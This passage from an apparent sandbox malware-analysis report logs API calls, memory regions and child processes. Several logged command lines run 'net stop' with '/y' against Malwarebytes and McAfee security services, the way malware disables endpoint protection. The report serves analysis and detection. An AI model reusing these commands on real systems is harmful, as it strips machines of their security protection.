"\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6132 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6133 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6149 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 549 os_tid = 0x1048 [0098.693] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fa70 | out: lpSystemTimeAsFileTime=0x12fa70*(dwLowDateTime=0xeffebe30, dwHighDateTime=0x1d48689)) [0098.694] GetCurrentProcessId () returned 0xe60 [0098.694] GetCurrentThreadId () returned 0x1048 [0098.694] GetTickCount () returned 0x2276d [0098.694] QueryPerformanceCounter (in: lpPerformanceCount=0x12fa78 | out: lpPerformanceCount=0x12fa78*=1814561200000) returned 1 [0098.695] GetModuleHandleW (lpModuleName=0x0) returned 0xffe00000 [0098.695] __set_app_type (_Type=0x1) [0098.696] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe19c9c) returned 0x0 [0098.696] __getmainargs (in: _Argc=0xffe24780, _Argv=0xffe24790, _Env=0xffe24788, _DoWildCard=0, _StartInfo=0xffe2479c | out: _Argc=0xffe24780, _Argv=0xffe24790, _Env=0xffe24788) returned 0 [0098.696] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.696] GetConsoleOutputCP () returned 0x1b5 [0098.750] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe2cec0 | out: lpCPInfo=0xffe2cec0) returned 1 [0098.750] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0098.752] sprintf_s (in: _DstBuf=0x12fa18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0098.752] setlocale (category=0, locale=".437") returned="English_United States.437" [0098.754] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.754] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0098.754] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MBEndpointAgent /y" [0098.754] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f7b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0098.754] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0098.754] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fa08 | out: Buffer=0x12fa08*=0x174d50) returned 0x0 [0098.754] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fa08 | out: Buffer=0x12fa08*=0x17c100) returned 0x0 [0098.754] _fileno (_File=0x7fefdba2a80) returned 0 [0098.755] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0098.755] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0098.755] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0098.755] _wcsicmp (_String1="config", _String2="stop") returned -16 [0098.755] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0098.755] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0098.755] _wcsicmp (_String1="file", _String2="stop") returned -13 [0098.755] _wcsicmp (_String1="files", _String2="stop") returned -13 [0098.755] _wcsicmp (_String1="group", _String2="stop") returned -12 [0098.755] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0098.755] _wcsicmp (_String1="help", _String2="stop") returned -11 [0098.755] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0098.755] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0098.755] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0098.755] _wcsicmp (_String1="session", _String2="stop") returned -15 [0098.755] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0098.756] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0098.756] _wcsicmp (_String1="share", _String2="stop") returned -12 [0098.756] _wcsicmp (_String1="start", _String2="stop") returned -14 [0098.756] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0098.756] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0098.756] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0098.756] _wcsicmp (_String1="accounts", _String2="MBEndpointAgent") returned -12 [0098.756] _wcsicmp (_String1="computer", _String2="MBEndpointAgent") returned -10 [0098.756] _wcsicmp (_String1="config", _String2="MBEndpointAgent") returned -10 [0098.756] _wcsicmp (_String1="continue", _String2="MBEndpointAgent") returned -10 [0098.756] _wcsicmp (_String1="cont", _String2="MBEndpointAgent") returned -10 [0098.756] _wcsicmp (_String1="file", _String2="MBEndpointAgent") returned -7 [0098.756] _wcsicmp (_String1="files", _String2="MBEndpointAgent") returned -7 [0098.756] _wcsicmp (_String1="group", _String2="MBEndpointAgent") returned -6 [0098.756] _wcsicmp (_String1="groups", _String2="MBEndpointAgent") returned -6 [0098.756] _wcsicmp (_String1="help", _String2="MBEndpointAgent") returned -5 [0098.756] _wcsicmp (_String1="helpmsg", _String2="MBEndpointAgent") returned -5 [0098.756] _wcsicmp (_String1="localgroup", _String2="MBEndpointAgent") returned -1 [0098.756] _wcsicmp (_String1="pause", _String2="MBEndpointAgent") returned 3 [0098.756] _wcsicmp (_String1="session", _String2="MBEndpointAgent") returned 6 [0098.757] _wcsicmp (_String1="sessions", _String2="MBEndpointAgent") returned 6 [0098.757] _wcsicmp (_String1="sess", _String2="MBEndpointAgent") returned 6 [0098.757] _wcsicmp (_String1="share", _String2="MBEndpointAgent") returned 6 [0098.757] _wcsicmp (_String1="start", _String2="MBEndpointAgent") returned 6 [0098.757] _wcsicmp (_String1="stats", _String2="MBEndpointAgent") returned 6 [0098.757] _wcsicmp (_String1="statistics", _String2="MBEndpointAgent") returned 6 [0098.757] _wcsicmp (_String1="stop", _String2="MBEndpointAgent") returned 6 [0098.757] _wcsicmp (_String1="time", _String2="MBEndpointAgent") returned 7 [0098.757] _wcsicmp (_String1="user", _String2="MBEndpointAgent") returned 8 [0098.757] _wcsicmp (_String1="users", _String2="MBEndpointAgent") returned 8 [0098.757] _wcsicmp (_String1="msg", _String2="MBEndpointAgent") returned 17 [0098.757] _wcsicmp (_String1="messenger", _String2="MBEndpointAgent") returned 3 [0098.757] _wcsicmp (_String1="receiver", _String2="MBEndpointAgent") returned 5 [0098.757] _wcsicmp (_String1="rcv", _String2="MBEndpointAgent") returned 5 [0098.757] _wcsicmp (_String1="netpopup", _String2="MBEndpointAgent") returned 1 [0098.757] _wcsicmp (_String1="redirector", _String2="MBEndpointAgent") returned 5 [0098.757] _wcsicmp (_String1="redir", _String2="MBEndpointAgent") returned 5 [0098.757] _wcsicmp (_String1="rdr", _String2="MBEndpointAgent") returned 5 [0098.757] _wcsicmp (_String1="workstation", _String2="MBEndpointAgent") returned 10 [0098.757] _wcsicmp (_String1="work", _String2="MBEndpointAgent") returned 10 [0098.758] _wcsicmp (_String1="wksta", _String2="MBEndpointAgent") returned 10 [0098.758] _wcsicmp (_String1="prdr", _String2="MBEndpointAgent") returned 3 [0098.758] _wcsicmp (_String1="devrdr", _String2="MBEndpointAgent") returned -9 [0098.758] _wcsicmp (_String1="lanmanworkstation", _String2="MBEndpointAgent") returned -1 [0098.758] _wcsicmp (_String1="server", _String2="MBEndpointAgent") returned 6 [0098.758] _wcsicmp (_String1="svr", _String2="MBEndpointAgent") returned 6 [0098.758] _wcsicmp (_String1="srv", _String2="MBEndpointAgent") returned 6 [0098.758] _wcsicmp (_String1="lanmanserver", _String2="MBEndpointAgent") returned -1 [0098.758] _wcsicmp (_String1="alerter", _String2="MBEndpointAgent") returned -12 [0098.758] _wcsicmp (_String1="netlogon", _String2="MBEndpointAgent") returned 1 [0098.758] _wcsupr (in: _String="MBEndpointAgent" | out: _String="MBENDPOINTAGENT") returned="MBENDPOINTAGENT" [0098.758] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x17ce10 [0098.763] GetServiceKeyNameW (in: hSCManager=0x17ce10, lpDisplayName="MBENDPOINTAGENT", lpServiceName=0xffe25750, lpcchBuffer=0x12f928 | out: lpServiceName="", lpcchBuffer=0x12f928) returned 0 [0098.764] _wcsicmp (_String1="msg", _String2="MBENDPOINTAGENT") returned 17 [0098.764] _wcsicmp (_String1="messenger", _String2="MBENDPOINTAGENT") returned 3 [0098.764] _wcsicmp (_String1="receiver", _String2="MBENDPOINTAGENT") returned 5 [0098.764] _wcsicmp (_String1="rcv", _String2="MBENDPOINTAGENT") returned 5 [0098.764] _wcsicmp (_String1="redirector", _String2="MBENDPOINTAGENT") returned 5 [0098.764] _wcsicmp (_String1="redir", _String2="MBENDPOINTAGENT") returned 5 [0098.764] _wcsicmp (_String1="rdr", _String2="MBENDPOINTAGENT") returned 5 [0098.764] _wcsicmp (_String1="workstation", _String2="MBENDPOINTAGENT") returned 10 [0098.764] _wcsicmp (_String1="work", _String2="MBENDPOINTAGENT") returned 10 [0098.764] _wcsicmp (_String1="wksta", _String2="MBENDPOINTAGENT") returned 10 [0098.764] _wcsicmp (_String1="prdr", _String2="MBENDPOINTAGENT") returned 3 [0098.764] _wcsicmp (_String1="devrdr", _String2="MBENDPOINTAGENT") returned -9 [0098.764] _wcsicmp (_String1="lanmanworkstation", _String2="MBENDPOINTAGENT") returned -1 [0098.764] _wcsicmp (_String1="server", _String2="MBENDPOINTAGENT") returned 6 [0098.764] _wcsicmp (_String1="svr", _String2="MBENDPOINTAGENT") returned 6 [0098.764] _wcsicmp (_String1="srv", _String2="MBENDPOINTAGENT") returned 6 [0098.764] _wcsicmp (_String1="lanmanserver", _String2="MBENDPOINTAGENT") returned -1 [0098.764] _wcsicmp (_String1="alerter", _String2="MBENDPOINTAGENT") returned -12 [0098.765] _wcsicmp (_String1="netlogon", _String2="MBENDPOINTAGENT") returned 1 [0098.765] NetServiceControl (in: servername=0x0, service="MBENDPOINTAGENT", opcode=0x0, arg=0x0, bufptr=0x12f930 | out: bufptr=0x12f930) returned 0x889 [0098.765] wcscpy_s (in: _Destination=0xffe280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0098.765] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0098.766] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe25b50, nSize=0x800, Arguments=0xffe27f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0098.768] GetFileType (hFile=0xb) returned 0x2 [0098.768] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f7f8 | out: lpMode=0x12f7f8) returned 1 [0098.768] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe25b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f7f0, lpReserved=0x0 | out: lpBuffer=0xffe25b50*, lpNumberOfCharsWritten=0x12f7f0*=0x1e) returned 1 [0098.769] GetFileType (hFile=0xb) returned 0x2 [0098.769] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f7f8 | out: lpMode=0x12f7f8) returned 1 [0098.769] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe01efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f7f0, lpReserved=0x0 | out: lpBuffer=0xffe01efc*, lpNumberOfCharsWritten=0x12f7f0*=0x2) returned 1 [0098.769] _ultow (in: _Dest=0x889, _Radix=1243232 | out: _Dest=0x889) returned="2185" [0098.769] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe25b50, nSize=0x800, Arguments=0xffe27f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0098.770] GetFileType (hFile=0xb) returned 0x2 [0098.770] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f7f8 | out: lpMode=0x12f7f8) returned 1 [0098.770] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe25b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f7f0, lpReserved=0x0 | out: lpBuffer=0xffe25b50*, lpNumberOfCharsWritten=0x12f7f0*=0x34) returned 1 [0098.770] GetFileType (hFile=0xb) returned 0x2 [0098.771] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f7f8 | out: lpMode=0x12f7f8) returned 1 [0098.771] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe01efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f7f0, lpReserved=0x0 | out: lpBuffer=0xffe01efc*, lpNumberOfCharsWritten=0x12f7f0*=0x2) returned 1 [0098.771] NetApiBufferFree (Buffer=0x174d50) returned 0x0 [0098.771] NetApiBufferFree (Buffer=0x17c100) returned 0x0 [0098.771] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MBEndpointAgent /y" [0098.771] exit (_Code=2) Process: id = "134" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x61a11000" os_pid = "0x1114" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop McAfeeFrameworkMcAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6134 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6135 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6136 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6137 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6138 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6139 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6140 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6141 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6142 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6143 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6144 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6145 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6146 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6147 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6148 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 550 os_tid = 0x10e0 Process: id = "135" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x60030000" os_pid = "0x106c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop McShield /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6150 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6151 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6152 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6153 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 6154 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6155 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6156 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6157 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6158 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6159 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6160 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 6161 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6162 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 6163 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6164 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 552 os_tid = 0x1068 Process: id = "136" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5594f000" os_pid = "0x112c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop McTaskManager /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6165 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6166 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6167 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 6168 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 6169 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6170 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6171 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6172 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6173 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6174 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6175 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 6176 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6177 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6178 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6179 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 554 os_tid = 0x1150 Process: id = "137" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5606e000" os_pid = "0xd70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop mfemms /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6200 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6201 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6202 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 6203 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 6204 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6205 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6206 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6207 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6208 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6209 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6210 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 6211 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6212 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 6213 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6214 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6440 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6441 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6442 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6443 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 6444 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6445 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6446 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6447 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6448 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 6449 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 6450 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 6451 start_va = 